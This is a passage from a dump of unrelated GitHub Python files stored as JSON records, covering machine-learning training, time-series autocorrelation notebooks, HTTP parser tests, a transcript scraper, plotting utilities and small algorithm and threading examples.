m.__class__.__name__\n if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1:\n nn.init.kaiming_uniform_(m.weight)\n nn.init.zeros_(m.bias)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight, 1.0, 0.02)\n nn.init.zeros_(m.bias)\n elif classname.find('Linear') != -1:\n nn.init.xavier_normal_(m.weight)\n nn.init.zeros_(m.bias)\n\n\ndef calc_coeff(iter_num, high=1.0, low=0.0, alpha=10.0, max_iter=10000.0):\n return np.float(2.0 * (high - low) / (1.0 + np.exp(-alpha * iter_num / max_iter)) - (high - low) + low)\n\n\ndef grl_hook(coeff):\n def fun1(grad):\n return -coeff * grad.clone()\n\n return fun1\n\n\nclass AdversarialNetwork(nn.Module):\n\n def __init__(self, input_feature, hidden_size, dropout_rate=0.5):\n super(AdversarialNetwork, self).__init__()\n self.ad_layer1 = nn.Linear(in_features=input_feature, out_features=hidden_size)\n self.ad_layer2 = nn.Linear(in_features=hidden_size, out_features=hidden_size)\n self.ad_layer3 = nn.Linear(in_features=hidden_size, out_features=1)\n\n self.relu1 = nn.ReLU()\n self.relu2 = nn.ReLU()\n\n self.dropout1 = nn.Dropout(dropout_rate)\n self.dropout2 = nn.Dropout(dropout_rate)\n\n self.sigmoid = nn.Sigmoid()\n self.apply(init_weights)\n\n self.iter_num = 0\n self.alpha = 10\n self.low = 0.0\n self.high = 1.0\n self.max_iter = 10000.0\n\n def forward(self, x):\n if self.training == 1:\n self.iter_num += 1\n coeff = calc_coeff(iter_num=self.iter_num, high=self.high, low=self.low,\n alpha=self.alpha, max_iter=self.max_iter)\n x.register_hook(grl_hook(coeff=coeff))\n\n x = self.ad_layer1(x)\n x = self.relu1(x)\n x = self.dropout1(x)\n x = self.ad_layer2(x)\n x = self.relu2(x)\n x = self.dropout2(x)\n y = self.ad_layer3(x)\n y = self.sigmoid(y)\n\n return y\n\n def output_num(self):\n return 1\n\n def get_parameters(self):\n return [{\"params\": self.parameters(), \"lr_mult\": 10, 'decay_mult': 2}]\n\n\nnum_feature = 2048\nnet = BSP_CDAN(num_feature=num_feature)\nnet = net.to(device)\nad_net = AdversarialNetwork(input_feature=256, hidden_size=100)\nad_net = ad_net.to(device)\nnet.train(True)\nad_net.train(True)\n\ncriterion = {\"classifier\": nn.CrossEntropyLoss(), \"adversarial\": nn.BCELoss()}\noptimizer_dict = [{\"params\": filter(lambda p: p.requires_grad, net.model_fc.parameters()), \"lr\": 0.1},\n {\"params\": filter(lambda p: p.requires_grad, net.bottleneck_layer.parameters()), \"lr\": 1},\n {\"params\": filter(lambda p: p.requires_grad, net.classifiler_layer.parameters()), \"lr\": 1},\n {\"params\": filter(lambda p: p.requires_grad, ad_net.parameters()), \"lr\": 1}]\n\noptimizer = optim.SGD(optimizer_dict, lr=0.1, momentum=0.9, weight_decay=0.0005, nesterov=True)\n\n# train_cross_loss = train_transfer_loss = train_total_loss = train_sigma = 0.0\ntrain_classifier_loss = 0.0\ntrain_domain_loss = 0.0\ntrain_total_loss = 0.0\n\n\nlen_source = len(dset_loaders[\"train\"]) - 1\nlen_target = len(dset_loaders[\"val\"]) - 1\n\nparam_lr = []\niter_source = iter(dset_loaders[\"train\"])\niter_target = iter(dset_loaders[\"val\"])\n\nfor param_group in optimizer.param_groups:\n param_lr.append(param_group[\"lr\"])\n\ntest_interval = 100\nnum_iter = max_iter\n\nfor iter_num in range(1, num_iter + 1):\n print(iter_num)\n net.train(True)\n\n optimizer = inv_lr_scheduler(param_lr, optimizer, iter_num, init_lr=0.003, gamma=0.001, power=0.75)\n optimizer.zero_grad()\n\n if iter_num % len_source == 0:\n iter_source = iter(dset_loaders[\"train\"])\n if iter_num % len_target == 0:\n iter_target = iter(dset_loaders[\"val\"])\n\n data_source = iter_source.next()\n data_target = iter_target.next()\n\n input_source, label_source = data_source\n input_target, label_target = data_target\n\n inputs = torch.cat([input_source, input_target], dim=0)\n\n dc_target = torch.from_numpy(np.array([[1], ] * batch_size[\"train\"] + [[0], ] * batch_size[\"train\"])).float()\n\n inputs = inputs.to(device)\n labels =label_source.to(device)\n dc_target = dc_target.to(device)\n\n feature, outC = net(inputs)\n\n classifier_loss = criterion[\"classifier\"](outC.narrow(0, 0, batch_size[\"train\"]), labels)\n domain_logits = ad_net(feature)\n domain_loss = criterion[\"adversarial\"](domain_logits, dc_target)\n\n total_loss = classifier_loss + domain_loss\n total_loss.backward()\n optimizer.step()\n\n train_total_loss += total_loss.item()\n train_classifier_loss += classifier_loss.item()\n train_domain_loss += domain_loss.item()\n\n if iter_num % test_interval == 0:\n print(\"global stpes: %d\\t total_loss:%f\\t domain_loss:%f\\t label_loss:%f\"\n % (iter_num, train_total_loss, train_domain_loss, train_classifier_loss))\n train_classifier_loss = 0.0\n train_domain_loss = 0.0\n train_total_loss = 0.0\n\n net.eval()\n test_acc = test_target(loader=dset_loaders, model=net.predict_layer)\n print('test_acc:%.4f' % (test_acc))\n\n\n\n","repo_name":"jozerozero/my_dann","sub_path":"DANN.py","file_name":"DANN.py","file_ext":"py","file_size_in_byte":11931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18490421877","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Estimering av ACF\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.stattools import acf \n# if this gives you a warning, you should install the latest version of statsmodels.\n# you can download it as explained here: https://www.statsmodels.org/stable/index.html\n\n\n# In[2]:\n\n\nwn = np.random.normal(loc=5, scale=10, size=100)\nplt.plot(wn);\n\n\n# In[3]:\n\n\ndef sample_acvf(x,maxlag=None): #function consistent with Eq. (1.36) in textbook\n n = len(x)\n if maxlag==None:\n maxlag=n-1\n xmean = np.mean(x)\n gamma = np.zeros(maxlag)\n for h in range(0,maxlag):\n gamma[h] = 1/n*(x[h:]-xmean)@(x[:n-h]-xmean)\n #gamma[h] = 1/(n-h)*(x[h:]-xmean)@(x[:n-h]-xmean) # alternativ mindre brukt estimator\n return gamma\n\ndef sample_acf(x,maxlag=None): # function consistent with Eq. (1.37) in textbook\n acvf = sample_acvf(x,maxlag=maxlag)\n return acvf/acvf[0]\n\n\n# In[4]:\n\n\nfig, ax = plt.subplots(nrows=2,ncols=1,figsize = [15,9])\n\nax[0].plot(sample_acf(wn,maxlag=100))\nax[0].set_title('ACF implementert som beskrevet i læreboka',fontsize = 18)\nax[0].grid()\nax[0].tick_params(axis='both',labelsize=22)\n\nax[1].plot(acf(wn,nlags=100),color='red')\nax[1].set_title('ACF innebygd i Statsmodels',fontsize = 18)\nax[1].grid()\nax[1].set_xlabel('Time lag (h)',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# In[5]:\n\n\ndef acf_comp(x): # vi skal ikke bruke denne definisjonen\n n = len(x)\n xmean = np.mean(x)\n Rxx = np.zeros(n)\n for h in range(0,n):\n Rxx[h] = 1/n*(x[h:])@(x[:n-h])\n return Rxx\n\n\n# In[6]:\n\n\nplt.plot(acf_comp(wn));\n\n\n# ## ACF eksempler\n\n# In[7]:\n\n\n# Hvit støy igjen\n\nn=1000\nwn = np.random.normal(loc=0, scale=1, size=n)\n\nfig, ax = plt.subplots(ncols=1,nrows=2,figsize = [16,10])\nax[0].plot(wn);\nax[0].set_title('White noise',fontsize = 18)\nax[0].grid()\nax[0].set_xlim(0,n)\nax[0].tick_params(axis='both',labelsize=18)\n\nax[1].stem(np.arange(101),acf(wn,nlags=100))\n#ax[1].plot(np.arange(101),np.full(101,2/np.sqrt(n)),'--',color='gray')\n#ax[1].plot(np.arange(101),np.full(101,-2/np.sqrt(n)),'--',color='gray')\nax[1].grid()\nax[1].set_xlim(-1,100)\nax[1].set_ylabel('ACF',fontsize = 18)\nax[1].set_xlabel('Time lag',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# In[8]:\n\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfiledir = '/Users/hege-beatefredriksen/OneDrive - UiT Office 365/Teaching/STA-2003spring2019/Data/saved_from_astsa'\nfilename = 'soi.txt'\n\nfile = os.path.join(filedir, filename)\n\n# load data\ndatatable = pd.read_table(file,sep='\\t',engine='python')\nyear=datatable.iloc[:,0].values\nsoi=datatable.iloc[:,1].values\n\nn=len(soi)\n\nfig, ax = plt.subplots(ncols=1,nrows=2,figsize = [16,10])\nax[0].plot(year,soi);\nax[0].set_xlabel('Year',fontsize = 18)\nax[0].set_title('Southern Oscillation index',fontsize = 18)\nax[0].grid()\nax[0].set_xlim(min(year),max(year))\nax[0].tick_params(axis='both',labelsize=18)\n\nax[1].stem(np.arange(49)/12,acf(soi,nlags=4*12))\n#ax[1].plot(np.arange(49)/12,np.full(49,2/np.sqrt(n)),'--',color='gray')\n#ax[1].plot(np.arange(49)/12,np.full(49,-2/np.sqrt(n)),'--',color='gray')\nax[1].grid()\nax[1].set_ylabel('ACF',fontsize = 18)\nax[1].set_xlabel('Time lag (years)',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# In[9]:\n\n\nfilename = 'rec.txt'\nfile = os.path.join(filedir, filename)\n\n# load data\ndatatable = pd.read_table(file,sep='\\t',engine='python')\nyear=datatable.iloc[:,0].values\nrec=datatable.iloc[:,1].values\n\nfig, ax = plt.subplots(ncols=1,nrows=2,figsize = [16,10])\nax[0].plot(year,rec);\nax[0].set_xlabel('Year',fontsize = 18)\nax[0].set_title('Recruitment',fontsize = 18)\nax[0].grid()\nax[0].set_xlim(min(year),max(year))\nax[0].tick_params(axis='both',labelsize=18)\n\nax[1].stem(np.arange(49)/12,acf(rec,nlags=4*12))\n#ax[1].plot(np.arange(49)/12,np.full(49,2/np.sqrt(n)),'--',color='gray')\n#ax[1].plot(np.arange(49)/12,np.full(49,-2/np.sqrt(n)),'--',color='gray')\nax[1].grid()\nax[1].set_ylabel('ACF',fontsize = 18)\nax[1].set_xlabel('Time lag (years)',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# ## Kryss-korrelasjon. Bruker innebygd funksjon, og velger biased estimator\n\n# In[10]:\n\n\nfrom statsmodels.tsa.stattools import ccf \ncrosscorr_xy = ccf(soi,rec,unbiased=False) # vi skal bruke estimatoren som er biased. Merk at denne ikke er default.\n\nmaxlag = 12*4\n\nfig, ax = plt.subplots(figsize = [14,5])\nplt.stem(np.arange(maxlag+1)/12,crosscorr_xy[:maxlag+1])\nax.grid()\nax.set_ylabel('CCF',fontsize = 18)\nax.set_xlabel('Time lag (years)',fontsize = 18)\nax.tick_params(axis='both',labelsize=18)\n\n\n# In[11]:\n\n\ncrosscorr_yx = ccf(rec,soi,unbiased=False)\nmaxlag = 12*4\n\nfig, ax = plt.subplots(figsize = [14,5])\nplt.stem(np.arange(maxlag+1)/12,crosscorr_yx[:maxlag+1])\nax.grid()\nax.set_ylabel('ACF',fontsize = 18)\nax.set_xlabel('Time lag (years)',fontsize = 18)\nax.tick_params(axis='both',labelsize=18)\n\n\n# ## Kombinerer disse for å se på både positive og negative time lag\n\n# In[12]:\n\n\nprint(crosscorr_xy[0])\ncrosscorr_yx[::-1][-1]\n\n\n# In[13]:\n\n\nmaxlag=12*4\ncrosscorr = np.concatenate((crosscorr_yx[::-1][-maxlag-1:], crosscorr_xy[1:maxlag+1]))\n\nfig, ax = plt.subplots(figsize = [14,5])\nax.stem(np.arange(-maxlag, maxlag+1)/12,crosscorr);\nax.plot(np.arange(-maxlag, maxlag+1)/12,np.full(2*maxlag+1,2/np.sqrt(n)),'--',color='gray')\nax.plot(np.arange(-maxlag, maxlag+1)/12,np.full(2*maxlag+1,-2/np.sqrt(n)),'--',color='gray')\nax.grid()\nax.set_title('Kryss-korrelasjon mellom Recruitment og SOI',fontsize = 18)\nax.set_ylabel('CCF',fontsize = 18)\nax.set_xlabel('Time lag (years)',fontsize = 18)\nax.tick_params(axis='both',labelsize=18)\n\n\n# In[14]:\n\n\nfig, ax = plt.subplots(figsize = [6,6])\nax.scatter(rec,soi); # ved 0 time lag\nax.tick_params(axis='both',labelsize=18)\nax.set_ylabel('SOI',fontsize = 18)\nax.set_xlabel('Recruitment',fontsize = 18)\n\n\n# In[15]:\n\n\nprint(np.corrcoef(rec[6:],soi[:-6])[1,0])\n\nfig, ax = plt.subplots(figsize = [6,6])\nax.scatter(rec[6:],soi[:-6]); # ved time lag 6\nax.tick_params(axis='both',labelsize=18)\nax.set_ylabel('SOI',fontsize = 18)\nax.set_xlabel('Recruitment lagged with 6 months',fontsize = 18);\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MartinRovang/UniversityPhysics","sub_path":"Tidsrekker/Scripts/ACF_estimation.py","file_name":"ACF_estimation.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"20725161068","text":"import pandas as pd\nfrom trnsim.strategy import *\n\nif __name__ == '__main__' :\n data = pd.read_csv('./data/simulation_2022f.csv', sep=',')\n hold_days=1\n look_back_days=5\n high_cut=0.99\n low_cut=0.6\n spare_amount=300000\n max_portion=0.5\n fmc = ['XL', 'LG', 'SM']\n strgy = BuyHighSellLow(\n watching_list=data[data['model'].str[:2].isin(fmc)], \n begin='2022-01-01', end='2023-12-30', \n ranking_metric='score', high_cut=high_cut, low_cut=low_cut , verbose=0, funding=spare_amount,\n hold_days=hold_days, look_back_days=10, max_portion=max_portion\n )\n output1 = strgy.run()\n\n print(output1)\n result = pd.DataFrame.from_dict(strgy.stats)\n # result.plot()\n result.to_csv('net_{}_{}_{}_{}_{}.csv'.format('2022f300k', ''.join(fmc), high_cut, low_cut, max_portion), index=None)\n \n # output1 = BuyHighSellLow(\n # watching_list=data[data['model'].str[:2]=='MD'], begin='2022-12-01', end='2023-12-31', \n # ranking_metric='score', high_cut=0.99, low_cut=0.7, verbose=1, spare_amount=spare_amount,\n # hold_days=hold_days, look_back_days=look_back_days\n # ).run()\n\n # print(output1)","repo_name":"rexzhang2014/trn-sim","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19852019256","text":"import pytest\nimport io\n\nfrom http_parser.http import HttpStream\nfrom http_parser.parser import HttpParser\nfrom http_parser.pyparser import HttpParser as PyHttpParser\n\ndef _test_no_headers(parser):\n data = b'HTTP/1.1 200 Connection established\\r\\n\\r\\n'\n assert parser.execute(data, len(data)) == len(data)\n assert parser.is_headers_complete()\n assert parser.is_message_begin()\n assert not parser.is_partial_body()\n assert not parser.is_message_complete()\n\ndef _test_headers(parser):\n data = (b'HTTP/1.1 200 OK\\r\\n'\n b'Connection: Keep-Alive\\r\\n'\n b'Content-Length: 4\\r\\n'\n b'Content-type: text/plain\\r\\n\\r\\n'\n b'ciao')\n assert parser.execute(data, len(data)) == len(data)\n assert parser.is_headers_complete()\n assert parser.is_message_begin()\n assert parser.is_partial_body()\n assert parser.is_message_complete()\n\ndef test_client_no_headers():\n _test_no_headers(HttpParser())\n\ndef test_client_no_headers_py():\n _test_no_headers(PyHttpParser())\n\ndef test_client_headers():\n _test_headers(HttpParser())\n\ndef test_client_headers_py():\n _test_headers(PyHttpParser())\n\n","repo_name":"benoitc/http-parser","sub_path":"testing/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"81"} +{"seq_id":"25563658599","text":"import os\nimport requests\nimport json\nimport copy\nfrom dotenv import load_dotenv\n\nload_dotenv() # take environment variables from .env.\n\n\"\"\"\ndefault_params: dict = {\n \"max_tokens\": 128,\n \"temperature\": 0.8,\n \"top_p\": 0.95,\n \"top_k\": 40,\n \"repeat_penalty\": 1.1,\n \"stop\": []\n}\n\"\"\"\n\ncompletion_prompt_template = \"Q: {}? A: \"\ndefault_completion_params = {\"stop\": [\"Q:\", \"A:\", \"\\n\"]} \nuser=\"Human: \"\nassistant=\"AI: \"\ndefault_chat_params = {\"stop\": [user, assistant, \"\\n\"]} \ndef get_completion(prompt: str = None,\n params: dict = None,\n is_completion: bool = True):\n if is_completion:\n prompt = completion_prompt_template.format(prompt)\n completion_params = copy.deepcopy(default_completion_params)\n if params:\n completion_params.update(params)\n params = completion_params\n print(\"params\", params) \n payload = {\"prompt\": prompt, \"params\": params}\n api_url = os.environ.get(\"API_URL\")\n headers = {\n \"Content-Type\": \"application/json\",\n # \"Authorization\": f\"Bearer {os.environ['HF_API_TOKEN']}\"\n }\n\n data = json.dumps(payload)\n response = requests.request(\"POST\", api_url, headers=headers, data=data)\n completion = json.loads(response.content.decode(\"utf-8\"))\n return completion['message']['choices'][0]['text']\n\n\ndef format(messages=[], system=\"\", user=user, assistant=assistant):\n \"\"\"\n Format the messages from the API into human readable strings.\n \"\"\"\n formatted_message = \"\"\n\n for message in messages:\n if message['role'] == 'system':\n formatted_message += f\"{system}{message['content']}\\n\"\n elif message['role'] == 'user':\n formatted_message += f\"{user}{message['content']}\\n\"\n elif message['role'] == 'assistant':\n formatted_message += f\"{assistant}{message['content']}\\n\"\n\n return formatted_message\n\n\ndef get_completion_from_messages(messages=[],\n params: dict = None):\n prompt = format(messages)\n chat_params = copy.deepcopy(default_chat_params)\n if params:\n chat_params.update(params)\n return get_completion(prompt, chat_params, is_completion = False)\n\n\nif __name__ == '__main__':\n print(get_completion('AI is going to', params={\"temperature\": 0.5}))\n","repo_name":"limcheekin/prompt-engineering-for-developers","sub_path":"openllama-7b/generate_api.py","file_name":"generate_api.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35862372017","text":"\nfrom Binary_search_Recursive import searchHelper\n\ndef search(array , target):\n bound = 1 \n while bound < len(array) and array[bound] < target:\n bound *= 2 \n left = bound // 2\n right = min(bound, len(array)) \n return searchHelper(array, target, left , right)","repo_name":"neuodev/Searching-Algorithms","sub_path":"Exponential_Search.py","file_name":"Exponential_Search.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"3157241643","text":"from threading import Thread, Event\nimport time\n\n# Code to execute in an independent thread\n\n\ndef countdown(n, started_evt):\n print('1 new thread starting --- countdown starting')\n started_evt.set()\n while n > 0:\n print('T-minus', n)\n n -= 1\n time.sleep(1)\n\n\n# Create the event object that will be used to signal startup\nstarted_evt = Event()\n\n# Launch the thread and pass the startup event\nprint('Launching new thread --- countdown')\nt = Thread(target=countdown, args=(10, started_evt))\nt.start()\n\n# Wait for the thread to start\n\"\"\"\n当你执行这段代码,“1 countdown is running” 总是显示在 “countdown starting” 之后显示。这是由于使用 event 来协调线程,使得主线程要等到 countdown() 函数输出启动信息后,才能继续执行。\n\"\"\"\nstarted_evt.wait()\nprint('2 new thread --- countdown is running')\n","repo_name":"kevinxzl/python","sub_path":"p3/thread/thread04.py","file_name":"thread04.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25793917133","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\nimport argparse\nimport os\nimport pathlib\nfrom segment import Segment\n\n\n # url = 'https://theinfosphere.org/Transcript:Space_Pilot_3000'\n\n\ndef parse_time(time_id):\n return time_id[len('time-'):].split('-')\n\ndef get_segments_from_url(url: str):\n print(\"OPENING URL \" + url)\n page = requests.get(url)\n\n # Init soup\n soup = BeautifulSoup(page.text, \"html.parser\")\n # transcript = soup.find(\"div\", {\"class\": \"mw-parser-output\"})\n transcript = soup.find(\"div\", {\"id\": \"bodyContent\"})\n sections = transcript.find_all(\"div\", {\"class\": \"poem\"})\n\n # Parsing vars\n segments = []\n last_cleaned_text = 'NO TEXT SET'\n last_speaker = 'NO_SPEAKER_SET'\n last_time = [-1, -1]\n # Lags behind the sections by one section to roughly chop up the sections by timestamp\n for section in sections:\n if not (section.p.span):\n print(\"WARNING: Section without timestamp.\")\n print(\"SKIPPING SEGMENT\")\n print(section.p)\n print(\"CONTINUING\")\n continue\n \n # Timestamp ([m, s])\n current_time = parse_time(section.p.span['id'])\n\n # Update segments\n if last_time != [-1, -1]:\n segment = Segment(last_speaker, last_cleaned_text, last_time[0], last_time[1], current_time[0], str(int(current_time[1])-1))\n segments.append(segment) \n print(\"SEGMENT: \" + str(segment))\n\n # Set last time regardless of whether it's the first run or not\n last_time = current_time\n\n # Speaker\n last_speaker = section.p.b.text\n \n # ????\n speaker_section = section.p.find('b')\n speaker_section.extract()\n \n print(\"SECTION: \" + section.p.span['id'])\n time_section = section.p.span\n time_section.extract()\n \n # TODO: ???? i forgor\n\n # Text\n last_cleaned_text = section.p.text.rstrip()[2:]\n \n return segments\n\ndef write_segments(url: str, segment_output_filename: pathlib.Path):\n segments = get_segments_from_url(url)\n with open(segment_output_filename, \"w+\") as f:\n f.write(json.dumps(segments, default=(lambda x: x.__dict__ )))\n print(\"Output saved to \" + segment_output_filename)\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='Transcript Scrape and Transform CLI',\n description='Read transcripts and transform them into Segment data.')\n # epilog='Text at the bottom of help')\n\n parser.add_argument('-t', '--transcript',\n type=pathlib.Path,\n default='transcripts.txt')\n \n parser.add_argument('output_dir', help='Path to generate segments folder in.', nargs='?', default='segment_data')\n\n \n args = parser.parse_args()\n\n # Output dir check/creation\n if os.path.exists(args.output_dir):\n raise Exception('ERROR: output_dir already exists.')\n else:\n os.mkdir(args.output_dir)\n\n with open(args.transcript, 'r') as f:\n for line in f:\n [full_filename, url] = line.strip().split('|')\n filename = full_filename.split('.')[0]\n write_segments(url, os.path.join(args.output_dir, filename + \"_segments.json\"))\n print(filename)\n print(url)\n\nif __name__ == '__main__':\n main()\n\n# Run w/ hardcoded args\n# segments = get_segments()\n# with open(\"seg_out.json\", \"w+\") as f:\n# f.write(json.dumps(segments, default=(lambda x: x.__dict__ )))\n# #for segment in segments:\n# # f.write(json.dumps(segment.__dict__))\n# print(\"Output saved to seg_out.json\")","repo_name":"jackalope-code/future-tts","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13190204670","text":"import pyqtgraph as pg\nimport time\n\nclass Plotter():\n def __init__(self, app, plots_per_row, window_width=1280,\n window_height=800):\n self._app = app\n self._window = pg.QtWidgets.QMainWindow()\n self._window.resize(window_width,window_height)\n self._plots_per_row = plots_per_row\n if self._plots_per_row < 1:\n self._plots_per_row = 1\n self._layout = pg.QtWidgets.QGridLayout()\n self._num_plots = 0\n self._plot_dict = {}\n self._window_length_list = []\n self._xdata_list = []\n self._ydata_list = []\n self._data_lines_list = []\n self._data_line_labels = []\n self._pen_list = []\n self._widget = pg.QtWidgets.QWidget()\n self._widget.setLayout(self._layout)\n self._window.setCentralWidget(self._widget)\n \n def create_plot_widget(self, plot_id=\"\", xlabel=\"x_label\", ylabel=\"y_label\", \n legend=True, background_color=\"k\", window_length=100):\n row = self._num_plots//self._plots_per_row\n col = self._num_plots%self._plots_per_row\n plot_widget = pg.PlotWidget()\n plot_widget.setLabel('left', ylabel)\n plot_widget.setLabel('bottom', xlabel)\n plot_widget.setBackground(background_color)\n if legend == True:\n plot_widget.addLegend()\n self._layout.addWidget(plot_widget,row,col)\n if plot_id == \"\":\n plot_id = str(self._num_plots)\n self._plot_dict[plot_id] = self._num_plots\n self._window_length_list.append(window_length)\n self._xdata_list.append([])\n self._ydata_list.append([])\n self._data_lines_list.append([])\n self._data_line_labels.append({})\n self._num_plots += 1\n\n def create_data_set(self, plot_id, data_label, data_color=(255,0,0), data_thickness=15): #add func to change line thickenss\n plot_index = self._plot_dict[plot_id]\n pen = pg.mkPen(color=data_color)\n data_line = self._layout.itemAt(plot_index).widget().plot([], [], \n name=data_label, width=data_thickness, pen=pen)\n self._data_lines_list[plot_index].append(data_line)\n self._xdata_list[plot_index].append([])\n self._ydata_list[plot_index].append([])\n self._data_line_labels[plot_index][data_label] = len(self._data_lines_list[plot_index]) - 1\n\n def add_data_point(self, plot_id, data_label, xvalue, yvalue):\n plot_index = self._plot_dict[plot_id]\n dataset_index = self._data_line_labels[plot_index][data_label]\n self._xdata_list[plot_index][dataset_index].append(xvalue)\n self._ydata_list[plot_index][dataset_index].append(yvalue)\n if len(self._xdata_list[plot_index][dataset_index]) > self._window_length_list[plot_index]:\n self._xdata_list[plot_index][dataset_index].pop(0)\n self._ydata_list[plot_index][dataset_index].pop(0)\n\n def add_data_points(self, plot_id, data_label, xvalues, yvalues):\n plot_index = self._plot_dict[plot_id]\n dataset_index = self._data_line_labels[plot_index][data_label]\n self._xdata_list[plot_index][dataset_index] = self._xdata_list[plot_index][dataset_index] + xvalues\n self._ydata_list[plot_index][dataset_index] = self._ydata_list[plot_index][dataset_index] + yvalues\n len_arr = len(self._xdata_list[plot_index][dataset_index])\n window_length = self._window_length_list[plot_index]\n if len_arr > window_length:\n start_index = len_arr - window_length\n self._xdata_list[plot_index][dataset_index] = self._xdata_list[plot_index][dataset_index][start_index:]\n self._ydata_list[plot_index][dataset_index] = self._ydata_list[plot_index][dataset_index][start_index:]\n\n def set_plot_data(self,plot_id,data_label,xdata,ydata):\n plot_index = self._plot_dict[plot_id]\n dataset_index = self._data_line_labels[plot_index][data_label]\n self._xdata_list[plot_index][dataset_index] = xdata\n self._ydata_list[plot_index][dataset_index] = ydata\n self._window_length_list[plot_index] = len(self._xdata_list[plot_index][dataset_index])\n\n def set_window_length(self, plot_id, window_length):\n self._window_length_list[plot_id] = window_length\n \n def update_plots(self):\n for plot_index in range(self._num_plots):\n num_data_sets = len(self._data_lines_list[plot_index])\n for dataset_index in range(num_data_sets):\n self._data_lines_list[plot_index][dataset_index].setData(\n self._xdata_list[plot_index][dataset_index],\n self._ydata_list[plot_index][dataset_index])\n \n def process_app(self, sleep_time = 0):\n self._app.processEvents()\n time.sleep(sleep_time)\n\n def show_window(self, sleep_time = 0):\n self.update_plots()\n self._window.show()\n self.process_app(sleep_time)\n\n def close_window(self):\n self._window.close()\n\n def hold_window_until_exit(self):\n self._app.exec()\n\n def save_image(self,image_name=\"plotter_image\"):\n self._widget.grab().save(image_name+\".png\")","repo_name":"randybeard/mavsim_public","sub_path":"mavsim_python/plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":294,"dataset":"github-code","pt":"81"} +{"seq_id":"74982776904","text":"import numpy\nfrom core import Hardware, INF\nfrom unit import *\n\n\nclass NodeBase(Hardware):\n def __init__(self):\n super().__init__()\n self.node_type = 'router'\n self.pos = numpy.random.rand(2) * 1000 # 给出一个 (0~1000, 0~1000) 的随机位置信息\n\n\ndef nodeFactory(\n node_type='router', # enum('server', 'router', 'client')\n\n recv_rate=1,\n recv_capacity=INF,\n nonce_life_time=100_000,\n\n cs_capacity=None,\n cs_probability= 1.0,\n replace_mode=None,\n evict_mode=None, # enum('CONST', 'FIFO', 'LRU', 'GEOMETRIC')\n evict_life_time=None,\n\n AppType=AppUnit,\n InfoType=IOInfoUnit,\n ForwardType=FloodForwardUnit,\n ContentStoreType= ContentStoreUnit,\n):\n MODE_FIELD_MAP = {'FIFO': 'c_time', 'LRU': 'a_time', 'LFU': 'hit_count'}\n\n def factor():\n node = NodeBase()\n\n assert node_type in ('server', 'router', 'client')\n node.node_type = node_type\n\n node.pos = numpy.random.rand(2) * 1000 # 给出一个 (0~1000, 0~1000) 的随机位置信息\n\n # 配置接口模块\n node.install('face', FaceUnit(rate=recv_rate, capacity=recv_capacity, life_time=nonce_life_time))\n\n # 配置CS模块\n if cs_capacity is not None:\n node.install('cs', ContentStoreType(capacity=cs_capacity, probability=cs_probability))\n\n # 配置替换模块\n if replace_mode is not None:\n field = MODE_FIELD_MAP[replace_mode]\n node.install('replace', ReplaceUnit(field))\n\n # 安装自动驱逐模块\n if evict_mode is not None:\n assert evict_mode in CSEvictUnit.MODE_TYPES\n node.install('evict', CSEvictUnit(mode=evict_mode, life_time=evict_life_time))\n\n # 安装 应用层模块,信息模块, 转发模块\n node.install('app', AppType()) # 必须安装在FaceUnit后, 才能建立APPChannel\n node.install('info', InfoType()) # 安装在 ForwardUnit 前, InfoUnit 才能先行处理 inPack 信号\n node.install('forward', ForwardType())\n\n # 添加便捷调用函数\n node.store = node.api['CS.store']\n node.ask = node.api['App.ask']\n\n return node\n\n return factor\n","repo_name":"GeekBerry/LICNsim","sub_path":"unit/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29961507314","text":"import torch\r\n\r\nfrom collections import Counter\r\nfrom alpaca.uncertainty_estimator.masks import build_mask\r\nfrom typing import Iterable, Union, Dict\r\n\r\n\r\nimport numpy as np\r\nimport time\r\nimport random\r\n\r\nimport logging\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\nclass DropoutMC(torch.nn.Module):\r\n def __init__(self, p: float, activate=False):\r\n super().__init__()\r\n self.activate = activate\r\n self.p = p\r\n self.p_init = p\r\n\r\n def forward(self, x: torch.Tensor):\r\n return torch.nn.functional.dropout(\r\n x, self.p, training=self.training or self.activate\r\n )\r\n\r\n\r\ndef convert_to_mc_dropout(\r\n model: torch.nn.Module, substitution_dict: Dict[str, torch.nn.Module] = None\r\n):\r\n for i, layer in enumerate(list(model.children())):\r\n 